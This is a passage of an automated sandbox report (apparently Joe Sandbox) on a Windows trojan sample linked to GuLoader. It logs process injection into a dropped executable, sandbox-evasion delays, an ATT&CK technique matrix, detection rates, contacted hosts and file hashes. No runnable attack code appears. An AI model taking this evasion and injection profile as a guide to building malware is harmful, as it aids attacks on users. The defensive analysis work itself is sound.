    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | API/Special instruction interceptor: Address: 3C71B47
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6829
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2813
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748 | Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe TID: 6704 | Thread sleep time: -190000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe | Last function: Thread delayed
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_004068B4 FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00402910 FindFirstFileW
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: Anthranil.exe, 00000006.00000003.2615565193.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2626750886.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005E45000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2603901435.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000003.2592769349.0000000005E8A000.00000004.00000020.00020000.00000000.sdmp, Anthranil.exe, 00000006.00000002.3013439177.0000000005E82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | API call chain: ExitProcess graph end node (graph_0-3285)
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | API call chain: ExitProcess graph end node (graph_0-3437)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Anthranil.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Anthranil.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Anthranil.exe base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Anthranil.exe base: 1660000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Users\user\Desktop\AM983ebb5F.exe | Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Access Token Manipulation (1) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (21) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
    Credentials | Domains | Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Process Injection (411) | Virtualization/Sandbox Evasion (21) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | PowerShell (2) | Logon Script (Windows) | DLL Side-Loading (1) | Access Token Manipulation (1) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (411) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (114) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    Source | Detection | Scanner | Label
    AM983ebb5F.exe | 50% | ReversingLabs | Win32.Trojan.Leonem
    AM983ebb5F.exe | 69% | Virustotal |
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\Anthranil.exe | 50% | ReversingLabs | Win32.Trojan.Leonem
    C:\Users\user\AppData\Local\Temp\Anthranil.exe | 69% | Virustotal |
    C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | 0% | Virustotal |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    drive.google.com | 216.58.206.46 | true | false | | high
    drive.usercontent.google.com | 142.250.185.129 | true | false | | high
    IP | Domain | Country | ASN | ASN Name | Malicious
    142.250.185.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
    216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588781
                                                              Start date and time:2025-01-11 05:27:11 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 16s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of new started processes analysed:8
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:AM983ebb5F.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 99%
                                                              • Number of executed functions: 36
                                                              • Number of non-executed functions: 31
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes were analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              Time | Type | Description
                                                              23:28:11 | API Interceptor | 39x Sleep call for process: powershell.exe modified
                                                              23:29:32 | API Interceptor | 19x Sleep call for process: Anthranil.exe modified
                                                              No context
                                                              No context
                                                              No context
                                                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                              37f463bf4616ecd445d4a1937da06e19 | QNuQ5e175D.exe | malicious | GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | 7uY105UTJU.exe | malicious | GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | QNuQ5e175D.exe | malicious | GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | iwEnYIOol8.exe | malicious | FormBook, GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.07.exe | malicious | Nitol, Xmrig | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.08.exe | malicious | Nitol | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.08.exe | malicious | Unknown | 142.250.185.129, 216.58.206.46
                                                              37f463bf4616ecd445d4a1937da06e19 | yMXFgPOdf2.exe | malicious | GuLoader | 142.250.185.129, 216.58.206.46
                                                              Match | Associated Sample Name / URL | Detection | Threat Name
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | 7uY105UTJU.exe | malicious | GuLoader
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | iwEnYIOol8.exe | malicious | FormBook, GuLoader
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | 678763_PDF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | file.exe | malicious | GuLoader, Snake Keylogger
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | 4hIPvzV6a2.exe | malicious | Unknown
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
                                                              C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):53158
                                                                                  Entropy (8bit):5.062687652912555
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                  MD5:5D430F1344CE89737902AEC47C61C930
                                                                                  SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                  SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                  SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):732452
                                                                                  Entropy (8bit):7.815204873069211
                                                                                  Encrypted:false
